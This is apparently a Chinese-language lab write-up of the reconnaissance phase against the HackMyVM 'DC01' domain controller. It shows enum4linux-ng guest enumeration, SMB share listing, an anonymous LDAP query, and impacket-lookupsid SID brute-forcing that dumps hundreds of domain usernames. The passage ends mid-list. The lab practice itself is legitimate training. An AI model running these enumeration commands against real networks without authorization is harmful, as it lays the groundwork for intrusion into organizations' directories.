简介
靶机名称:dc01
难度:简单
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=DC01
本地环境
虚拟机:vitual box
靶场IP(DC01):192.168.56.128
跳板机IP(windows 11):192.168.56.1 192.168.190.100
渗透机IP(kali):192.168.190.131
扫描
这次探测相当不顺利,可能是网卡插太多然后都冲突了,总之经常扫到一半停下来。也有可能是流量控制或者防火墙之类的?
这次就用zenmap替代了,没有常规的http端口,但是有smb,ldap,DNS之类的服务,判断为域控。
smb
先用enum4linux-ng探探路
enum4linux-ng -A 192.168.56.128 -u "guest"
==========================
| Target Information |
==========================
[*] Target ........... 192.168.56.128
[*] Username ......... 'guest'
[*] Random Username .. 'vwmfyjhu'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
=======================================
| Listener Scan on 192.168.56.128 |
=======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
======================================================
| Domain Information via LDAP for 192.168.56.128 |
======================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: SOUPEDECODE.LOCAL
=============================================================
| NetBIOS Names and Workgroup/Domain for 192.168.56.128 |
=============================================================
[+] Got domain/workgroup name: SOUPEDECODE
[+] Full NetBIOS names information:
- SOUPEDECODE <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
- SOUPEDECODE <1c> - <GROUP> B <ACTIVE> Domain Controllers
- DC01 <00> - B <ACTIVE> Workstation Service
- SOUPEDECODE <1b> - B <ACTIVE> Domain Master Browser
- DC01 <20> - B <ACTIVE> File Server Service
- MAC Address = 08-00-27-D8-9E-16
===========================================
| SMB Dialect Check on 192.168.56.128 |
===========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
=============================================================
| Domain Information via SMB session for 192.168.56.128 |
=============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DC01
NetBIOS domain name: SOUPEDECODE
DNS domain: SOUPEDECODE.LOCAL
FQDN: DC01.SOUPEDECODE.LOCAL
Derived membership: domain member
Derived domain: SOUPEDECODE
===========================================
| RPC Session Check on 192.168.56.128 |
===========================================
[*] Check for null session
[-] Could not establish null session: STATUS_ACCESS_DENIED
[*] Check for user session
[+] Server allows session using username 'guest', password ''
[*] Check for random user
[+] Server allows session using username 'vwmfyjhu', password ''
[H] Rerunning enumeration with user 'vwmfyjhu' might give more results
=====================================================
| Domain Information via RPC for 192.168.56.128 |
=====================================================
[+] Domain: SOUPEDECODE
[+] Domain SID: S-1-5-21-2986980474-46765180-2505414164
[+] Membership: domain member
=================================================
| OS Information via RPC for 192.168.56.128 |
=================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: ''
OS build: '20348'
Native OS: not supported
Native LAN manager: not supported
Platform id: '500'
Server type: '0x80102b'
Server type string: Wk Sv PDC Tim NT
=======================================
| Users via RPC on 192.168.56.128 |
=======================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED
========================================
| Groups via RPC on 192.168.56.128 |
========================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED
========================================
| Shares via RPC on 192.168.56.128 |
========================================
[*] Enumerating shares
[+] Found 7 share(s):
ADMIN$:
comment: Remote Admin
type: Disk
C$:
comment: Default share
type: Disk
IPC$:
comment: Remote IPC
type: IPC
NETLOGON:
comment: Logon server share
type: Disk
SYSVOL:
comment: Logon server share
type: Disk
Users:
comment: ''
type: Disk
backup:
comment: ''
type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share NETLOGON
[+] Mapping: OK, Listing: DENIED
[*] Testing share SYSVOL
[+] Mapping: OK, Listing: DENIED
[*] Testing share Users
[+] Mapping: OK, Listing: DENIED
[*] Testing share backup
[+] Mapping: OK, Listing: DENIED
===========================================
| Policies via RPC for 192.168.56.128 |
===========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed
===========================================
| Printers via RPC for 192.168.56.128 |
===========================================
[+] No printers available
Completed after 1.44 seconds
域名是SOUPEDECODE.LOCAL,系统是win10
guest账户列出了共享的目录
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[/] Enumerating shares... [-] Enumerating shares...
[+] IP: 192.168.56.128:445 Name: 192.168.56.128 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
不过访客账号基本没有权限。换个道。
ldap
ldapsearch进行信息收集
ldapsearch -x -H ldap://192.168.56.128 -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL
ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=L
OCAL
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
ation,DC=SOUPEDECODE,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=SOUPEDECODE,DC=LOCAL
namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 49173
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
dnsHostName: DC01.SOUPEDECODE.LOCAL
defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL
currentTime: 20240718004208.0Z
configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
然后因为没有账户,目前只能收集到这点信息
dns
SOUPEDECODE.LOCAL没有返回什么内容
dig ANY SOUPEDECODE.LOCAL @192.168.56.128
;; communications error to 192.168.56.128#53: timed out
; <<>> DiG 9.19.25-185-g392e7199df2-1-Debian <<>> ANY SOUPEDECODE.LOCAL @192.168.56.128
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 51511
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;SOUPEDECODE.LOCAL. IN ANY
;; Query time: 179 msec
;; SERVER: 192.168.56.128#53(192.168.56.128) (TCP)
;; WHEN: Wed Jul 17 05:53:49 EDT 2024
;; MSG SIZE rcvd: 46
lookupsid
有smb也意味着可以试试lookupsid,结果跑出一大堆用户
impacket-lookupsid soupedecode.local/anonymous@192.168.56.128
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Brute forcing SIDs at 192.168.56.128
[*] StringBinding ncacn_np:192.168.56.128[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\Administrator (SidTypeUser)
501: SOUPEDECODE\Guest (SidTypeUser)
502: SOUPEDECODE\krbtgt (SidTypeUser)
512: SOUPEDECODE\Domain Admins (SidTypeGroup)
513: SOUPEDECODE\Domain Users (SidTypeGroup)
514: SOUPEDECODE\Domain Guests (SidTypeGroup)
515: SOUPEDECODE\Domain Computers (SidTypeGroup)
516: SOUPEDECODE\Domain Controllers (SidTypeGroup)
517: SOUPEDECODE\Cert Publishers (SidTypeAlias)
518: SOUPEDECODE\Schema Admins (SidTypeGroup)
519: SOUPEDECODE\Enterprise Admins (SidTypeGroup)
520: SOUPEDECODE\Group Policy Creator Owners (SidTypeGroup)
521: SOUPEDECODE\Read-only Domain Controllers (SidTypeGroup)
522: SOUPEDECODE\Cloneable Domain Controllers (SidTypeGroup)
525: SOUPEDECODE\Protected Users (SidTypeGroup)
526: SOUPEDECODE\Key Admins (SidTypeGroup)
527: SOUPEDECODE\Enterprise Key Admins (SidTypeGroup)
553: SOUPEDECODE\RAS and IAS Servers (SidTypeAlias)
571: SOUPEDECODE\Allowed RODC Password Replication Group (SidTypeAlias)
572: SOUPEDECODE\Denied RODC Password Replication Group (SidTypeAlias)
1000: SOUPEDECODE\DC01$ (SidTypeUser)
1101: SOUPEDECODE\DnsAdmins (SidTypeAlias)
1102: SOUPEDECODE\DnsUpdateProxy (SidTypeGroup)
1103: SOUPEDECODE\bmark0 (SidTypeUser)
1104: SOUPEDECODE\otara1 (SidTypeUser)
1105: SOUPEDECODE\kleo2 (SidTypeUser)
1106: SOUPEDECODE\eyara3 (SidTypeUser)
1107: SOUPEDECODE\pquinn4 (SidTypeUser)
1108: SOUPEDECODE\jharper5 (SidTypeUser)
1109: SOUPEDECODE\bxenia6 (SidTypeUser)
1110: SOUPEDECODE\gmona7 (SidTypeUser)
1111: SOUPEDECODE\oaaron8 (SidTypeUser)
1112: SOUPEDECODE\pleo9 (SidTypeUser)
1113: SOUPEDECODE\evictor10 (SidTypeUser)
1114: SOUPEDECODE\wreed11 (SidTypeUser)
1115: SOUPEDECODE\bgavin12 (SidTypeUser)
1116: SOUPEDECODE\ndelia13 (SidTypeUser)
1117: SOUPEDECODE\akevin14 (SidTypeUser)
1118: SOUPEDECODE\kxenia15 (SidTypeUser)
1119: SOUPEDECODE\ycody16 (SidTypeUser)
1120: SOUPEDECODE\qnora17 (SidTypeUser)
1121: SOUPEDECODE\dyvonne18 (SidTypeUser)
1122: SOUPEDECODE\qxenia19 (SidTypeUser)
1123: SOUPEDECODE\rreed20 (SidTypeUser)
1124: SOUPEDECODE\icody21 (SidTypeUser)
1125: SOUPEDECODE\ftom22 (SidTypeUser)
1126: SOUPEDECODE\ijake23 (SidTypeUser)
1127: SOUPEDECODE\rpenny24 (SidTypeUser)
1128: SOUPEDECODE\jiris25 (SidTypeUser)
1129: SOUPEDECODE\colivia26 (SidTypeUser)
1130: SOUPEDECODE\pyvonne27 (SidTypeUser)
1131: SOUPEDECODE\zfrank28 (SidTypeUser)
1132: SOUPEDECODE\ybob317 (SidTypeUser)
1133: SOUPEDECODE\file_svc (SidTypeUser)
1134: SOUPEDECODE\charlie (SidTypeUser)
1135: SOUPEDECODE\qethan32 (SidTypeUser)
1136: SOUPEDECODE\khenry33 (SidTypeUser)
1137: SOUPEDECODE\sjudy34 (SidTypeUser)
1138: SOUPEDECODE\rrachel35 (SidTypeUser)
1139: SOUPEDECODE\caiden36 (SidTypeUser)
1140: SOUPEDECODE\xbella37 (SidTypeUser)
1141: SOUPEDECODE\smark38 (SidTypeUser)
1142: SOUPEDECODE\zximena448 (SidTypeUser)
1143: SOUPEDECODE\fmike40 (SidTypeUser)
1144: SOUPEDECODE\yeli41 (SidTypeUser)
1145: SOUPEDECODE\knina42 (SidTypeUser)
1146: SOUPEDECODE\vhelen43 (SidTypeUser)
1147: SOUPEDECODE\xoliver44 (SidTypeUser)
1148: SOUPEDECODE\jxander45 (SidTypeUser)
1149: SOUPEDECODE\czane46 (SidTypeUser)
1150: SOUPEDECODE\rwendy47 (SidTypeUser)
1151: SOUPEDECODE\usean48 (SidTypeUser)
1152: SOUPEDECODE\fhenry49 (SidTypeUser)
1153: SOUPEDECODE\xkaren50 (SidTypeUser)
1154: SOUPEDECODE\rbianca51 (SidTypeUser)
1155: SOUPEDECODE\mmona52 (SidTypeUser)
1156: SOUPEDECODE\znora53 (SidTypeUser)
1157: SOUPEDECODE\zlila54 (SidTypeUser)
1158: SOUPEDECODE\lliam55 (SidTypeUser)
1159: SOUPEDECODE\znathan56 (SidTypeUser)
1160: SOUPEDECODE\kbella57 (SidTypeUser)
1161: SOUPEDECODE\malice58 (SidTypeUser)
1162: SOUPEDECODE\gadam59 (SidTypeUser)
1163: SOUPEDECODE\byara60 (SidTypeUser)
1164: SOUPEDECODE\fpenny61 (SidTypeUser)
1165: SOUPEDECODE\tmona62 (SidTypeUser)
1166: SOUPEDECODE\iuma63 (SidTypeUser)
1167: SOUPEDECODE\voscar64 (SidTypeUser)
1168: SOUPEDECODE\mpeter65 (SidTypeUser)
1169: SOUPEDECODE\suna66 (SidTypeUser)
1170: SOUPEDECODE\bmegan67 (SidTypeUser)
1171: SOUPEDECODE\vsteve68 (SidTypeUser)
1172: SOUPEDECODE\zcolin69 (SidTypeUser)
1173: SOUPEDECODE\wzane70 (SidTypeUser)
1174: SOUPEDECODE\poscar71 (SidTypeUser)
1175: SOUPEDECODE\walice72 (SidTypeUser)
1176: SOUPEDECODE\gvera73 (SidTypeUser)
1177: SOUPEDECODE\khenry74 (SidTypeUser)
1178: SOUPEDECODE\otom75 (SidTypeUser)
1179: SOUPEDECODE\hyusuf76 (SidTypeUser)
1180: SOUPEDECODE\xyara77 (SidTypeUser)
1181: SOUPEDECODE\aian78 (SidTypeUser)
1182: SOUPEDECODE\xkate578 (SidTypeUser)
1183: SOUPEDECODE\ctina80 (SidTypeUser)
1184: SOUPEDECODE\xrose81 (SidTypeUser)
1185: SOUPEDECODE\xharper82 (SidTypeUser)
1186: SOUPEDECODE\xkevin83 (SidTypeUser)
1187: SOUPEDECODE\talice84 (SidTypeUser)
1188: SOUPEDECODE\lyvonne85 (SidTypeUser)
1189: SOUPEDECODE\tdelia86 (SidTypeUser)
1190: SOUPEDECODE\dximena87 (SidTypeUser)
1191: SOUPEDECODE\htara88 (SidTypeUser)
1192: SOUPEDECODE\wquinn89 (SidTypeUser)
1193: SOUPEDECODE\agrace90 (SidTypeUser)
1194: SOUPEDECODE\oquinton91 (SidTypeUser)
1195: SOUPEDECODE\reva92 (SidTypeUser)
1196: SOUPEDECODE\hadam93 (SidTypeUser)
1197: SOUPEDECODE\pwyatt94 (SidTypeUser)
1198: SOUPEDECODE\uisaac95 (SidTypeUser)
1199: SOUPEDECODE\msean96 (SidTypeUser)
1200: SOUPEDECODE\lvera97 (SidTypeUser)
1201: SOUPEDECODE\vmark98 (SidTypeUser)
1202: SOUPEDECODE\bvictor99 (SidTypeUser)
1203: SOUPEDECODE\bviolet100 (SidTypeUser)
1204: SOUPEDECODE\qethan101 (SidTypeUser)
1205: SOUPEDECODE\ckevin102 (SidTypeUser)
1206: SOUPEDECODE\qximena103 (SidTypeUser)
1207: SOUPEDECODE\ibella104 (SidTypeUser)
1208: SOUPEDECODE\ywendy105 (SidTypeUser)
1209: SOUPEDECODE\kbob106 (SidTypeUser)
1210: SOUPEDECODE\cuna107 (SidTypeUser)
1211: SOUPEDECODE\stara108 (SidTypeUser)
1212: SOUPEDECODE\jeva109 (SidTypeUser)
1213: SOUPEDECODE\rbob110 (SidTypeUser)
1214: SOUPEDECODE\qyvonne111 (SidTypeUser)
1215: SOUPEDECODE\euna112 (SidTypeUser)
1216: SOUPEDECODE\wmark113 (SidTypeUser)
1217: SOUPEDECODE\nlila114 (SidTypeUser)
1218: SOUPEDECODE\clila115 (SidTypeUser)
1219: SOUPEDECODE\ofaith116 (SidTypeUser)
1220: SOUPEDECODE\mkylie117 (SidTypeUser)
1221: SOUPEDECODE\fbeth103 (SidTypeUser)
1222: SOUPEDECODE\hquinn119 (SidTypeUser)
1223: SOUPEDECODE\nhannah120 (SidTypeUser)
1224: SOUPEDECODE\iuna121 (SidTypeUser)
1225: SOUPEDECODE\xcolin122 (SidTypeUser)
1226: SOUPEDECODE\ckate123 (SidTypeUser)
1227: SOUPEDECODE\lwillow124 (SidTypeUser)
1228: SOUPEDECODE\ngavin125 (SidTypeUser)
1229: SOUPEDECODE\yjack126 (SidTypeUser)
1230: SOUPEDECODE\rnathan127 (SidTypeUser)
1231: SOUPEDECODE\vsean128 (SidTypeUser)
1232: SOUPEDECODE\jtina129 (SidTypeUser)
1233: SOUPEDECODE\wcharlie130 (SidTypeUser)
1234: SOUPEDECODE\isean131 (SidTypeUser)
1235: SOUPEDECODE\yzara132 (SidTypeUser)
1236: SOUPEDECODE\dlila133 (SidTypeUser)
1237: SOUPEDECODE\bnoah134 (SidTypeUser)
1238: SOUPEDECODE\calice135 (SidTypeUser)
1239: SOUPEDECODE\tjohn136 (SidTypeUser)
1240: SOUPEDECODE\zgavin137 (SidTypeUser)
1241: SOUPEDECODE\bkaren138 (SidTypeUser)
1242: SOUPEDECODE\zsophie139 (SidTypeUser)
1243: SOUPEDECODE\hkate140 (SidTypeUser)
1244: SOUPEDECODE\kkaren141 (SidTypeUser)
1245: SOUPEDECODE\rzane142 (SidTypeUser)
1246: SOUPEDECODE\coliver143 (SidTypeUser)
1247: SOUPEDECODE\lviolet144 (SidTypeUser)
1248: SOUPEDECODE\whannah145 (SidTypeUser)
1249: SOUPEDECODE\etara146 (SidTypeUser)
1250: SOUPEDECODE\brachel147 (SidTypeUser)
1251: SOUPEDECODE\inina148 (SidTypeUser)
1252: SOUPEDECODE\wnathan149 (SidTypeUser)
1253: SOUPEDECODE\vopal150 (SidTypeUser)
1254: SOUPEDECODE\vadam151 (SidTypeUser)
1255: SOUPEDECODE\exenia152 (SidTypeUser)
1256: SOUPEDECODE\pkylie153 (SidTypeUser)
1257: SOUPEDECODE\tcody154 (SidTypeUser)
1258: SOUPEDECODE\yleo155 (SidTypeUser)
1259: SOUPEDECODE\tdavid156 (SidTypeUser)
1260: SOUPEDECODE\jdaisy157 (SidTypeUser)
1261: SOUPEDECODE\emegan158 (SidTypeUser)
1262: SOUPEDECODE\bkylie159 (SidTypeUser)
1263: SOUPEDECODE\udaisy160 (SidTypeUser)
1264: SOUPEDECODE\givy161 (SidTypeUser)
1265: SOUPEDECODE\upaula162 (SidTypeUser)
1266: SOUPEDECODE\jliam163 (SidTypeUser)
1267: SOUPEDECODE\ssophie164 (SidTypeUser)
1268: SOUPEDECODE\usteve165 (SidTypeUser)
1269: SOUPEDECODE\eyusuf166 (SidTypeUser)
1270: SOUPEDECODE\gursula167 (SidTypeUser)
1271: SOUPEDECODE\dyara168 (SidTypeUser)
1272: SOUPEDECODE\msam169 (SidTypeUser)
1273: SOUPEDECODE\tkate170 (SidTypeUser)
1274: SOUPEDECODE\pjake171 (SidTypeUser)
1275: SOUPEDECODE\vgeorge172 (SidTypeUser)
1276: SOUPEDECODE\hbianca173 (SidTypeUser)
1277: SOUPEDECODE\yrita174 (SidTypeUser)
1278: SOUPEDECODE\bnina175 (SidTypeUser)
1279: SOUPEDECODE\vyusuf176 (SidTypeUser)
1280: SOUPEDECODE\qquincy177 (SidTypeUser)
1281: SOUPEDECODE\gian178 (SidTypeUser)
1282: SOUPEDECODE\hwillow179 (SidTypeUser)
1283: SOUPEDECODE\sursula180 (SidTypeUser)
1284: SOUPEDECODE\qyara181 (SidTypeUser)
1285: SOUPEDECODE\xhelen182 (SidTypeUser)
1286: SOUPEDECODE\asteve183 (SidTypeUser)
1287: SOUPEDECODE\odiana184 (SidTypeUser)
1288: SOUPEDECODE\dquinn185 (SidTypeUser)
1289: SOUPEDECODE\krose186 (SidTypeUser)
1290: SOUPEDECODE\eliam187 (SidTypeUser)
1291: SOUPEDECODE\hdiana188 (SidTypeUser)
1292: SOUPEDECODE\jmike189 (SidTypeUser)
1293: SOUPEDECODE\jpeter190 (SidTypeUser)
1294: SOUPEDECODE\yzach191 (SidTypeUser)
1295: SOUPEDECODE\enora192 (SidTypeUser)
1296: SOUPEDECODE\bolivia193 (SidTypeUser)
1297: SOUPEDECODE\knathan194 (SidTypeUser)
1298: SOUPEDECODE\kyvonne195 (SidTypeUser)
1299: SOUPEDECODE\rdavid196 (SidTypeUser)
1300: SOUPEDECODE\julysses197 (SidTypeUser)
1301: SOUPEDECODE\vmark198 (SidTypeUser)
1302: SOUPEDECODE\hwyatt199 (SidTypeUser)
1303: SOUPEDECODE\areed200 (SidTypeUser)
1304: SOUPEDECODE\bian201 (SidTypeUser)
1305: SOUPEDECODE\tsophie202 (SidTypeUser)
1306: SOUPEDECODE\ouna203 (SidTypeUser)
1307: SOUPEDECODE\jsean204 (SidTypeUser)
1308: SOUPEDECODE\speter205 (SidTypeUser)
1309: SOUPEDECODE\rtom206 (SidTypeUser)
1310: SOUPEDECODE\dulysses207 (SidTypeUser)
1311: SOUPEDECODE\ucolin208 (SidTypeUser)
1312: SOUPEDECODE\xpenny209 (SidTypeUser)
1313: SOUPEDECODE\ytara210 (SidTypeUser)
1314: SOUPEDECODE\ubianca211 (SidTypeUser)
1315: SOUPEDECODE\mquinn212 (SidTypeUser)
1316: SOUPEDECODE\arachel213 (SidTypeUser)
1317: SOUPEDECODE\flila214 (SidTypeUser)
1318: SOUPEDECODE\jquinton215 (SidTypeUser)
1319: SOUPEDECODE\gulysses216 (SidTypeUser)
1320: SOUPEDECODE\mpaula217 (SidTypeUser)
1321: SOUPEDECODE\bfelix218 (SidTypeUser)
1322: SOUPEDECODE\lolivia219 (SidTypeUser)
1323: SOUPEDECODE\xdiana220 (SidTypeUser)
1324: SOUPEDECODE\dtracy221 (SidTypeUser)
1325: SOUPEDECODE\hharper222 (SidTypeUser)
1326: SOUPEDECODE\eviolet223 (SidTypeUser)
1327: SOUPEDECODE\npaul224 (SidTypeUser)
1328: SOUPEDECODE\rivy225 (SidTypeUser)
1329: SOUPEDECODE\atom226 (SidTypeUser)
1330: SOUPEDECODE\jrose227 (SidTypeUser)
1331: SOUPEDECODE\dgeorge228 (SidTypeUser)
1332: SOUPEDECODE\egrace229 (SidTypeUser)
1333: SOUPEDECODE\ffiona230 (SidTypeUser)
1334: SOUPEDECODE\gvincent231 (SidTypeUser)
1335: SOUPEDECODE\neric232 (SidTypeUser)
1336: SOUPEDECODE\fpeter233 (SidTypeUser)
1337: SOUPEDECODE\ljack234 (SidTypeUser)
1338: SOUPEDECODE\xursula235 (SidTypeUser)
1339: SOUPEDECODE\ecody236 (SidTypeUser)
1340: SOUPEDECODE\acarl237 (SidTypeUser)
1341: SOUPEDECODE\halice238 (SidTypeUser)
1342: SOUPEDECODE\fgeorge239 (SidTypeUser)
1343: SOUPEDECODE\tnathan240 (SidTypeUser)
1344: SOUPEDECODE\ndelia241 (SidTypeUser)
1345: SOUPEDECODE\bpeter242 (SidTypeUser)
1346: SOUPEDECODE\qalice243 (SidTypeUser)
1347: SOUPEDECODE\ipenny244 (SidTypeUser)
1348: SOUPEDECODE\ygrace245 (SidTypeUser)
1349: SOUPEDECODE\luna246 (SidTypeUser)
1350: SOUPEDECODE\erose248 (SidTypeUser)
1351: SOUPEDECODE\roliver249 (SidTypeUser)
1352: SOUPEDECODE\stom250 (SidTypeUser)
1353: SOUPEDECODE\kalice251 (SidTypeUser)
1354: SOUPEDECODE\syara252 (SidTypeUser)
1355: SOUPEDECODE\wpaula254 (SidTypeUser)
1356: SOUPEDECODE\ypaul255 (SidTypeUser)
1357: SOUPEDECODE\cnathan256 (SidTypeUser)
1358: SOUPEDECODE\uuma257 (SidTypeUser)
1359: SOUPEDECODE\nnoah258 (SidTypeUser)
1360: SOUPEDECODE\yrachel259 (SidTypeUser)
1361: SOUPEDECODE\vjudy260 (SidTypeUser)
1362: SOUPEDECODE\dkate261 (SidTypeUser)
1363: SOUPEDECODE\efelix262 (SidTypeUser)
1364: SOUPEDECODE\qquinn263 (SidTypeUser)
1365: SOUPEDECODE\hbeth264 (SidTypeUser)
1366: SOUPEDECODE\jlaura265 (SidTypeUser)
1367: SOUPEDECODE\cwillow266 (SidTypeUser)
1368: SOUPEDECODE\wkate267 (SidTypeUser)
1369: SOUPEDECODE\sgeorge268 (SidTypeUser)
1370: SOUPEDECODE\nmona269 (SidTypeUser)
1371: SOUPEDECODE\fpeter270 (SidTypeUser)
1372: SOUPEDECODE\jpaul271 (SidTypeUser)
1373: SOUPEDECODE\joliver272 (SidTypeUser)
1374: SOUPEDECODE\opeter273 (SidTypeUser)
1375: SOUPEDECODE\wfaith274 (SidTypeUser)
1376: SOUPEDECODE\dkaren275 (SidTypeUser)
1377: SOUPEDECODE\oulysses276 (SidTypeUser)
1378: SOUPEDECODE\atom277 (SidTypeUser)
1379: SOUPEDECODE\ibianca278 (SidTypeUser)
1380: SOUPEDECODE\fhenry279 (SidTypeUser)
1381: SOUPEDECODE\uulysses280 (SidTypeUser)
1382: SOUPEDECODE\gpaul281 (SidTypeUser)
1383: SOUPEDECODE\lisaac282 (SidTypeUser)
1384: SOUPEDECODE\cuna283 (SidTypeUser)
1385: SOUPEDECODE\fnora284 (SidTypeUser)
1386: SOUPEDECODE\idelia286 (SidTypeUser)
1387: SOUPEDECODE\vrose287 (SidTypeUser)
1388: SOUPEDECODE\qkevin288 (SidTypeUser)
1389: SOUPEDECODE\qjack289 (SidTypeUser)
1390: SOUPEDECODE\qopal290 (SidTypeUser)
1391: SOUPEDECODE\enoah291 (SidTypeUser)
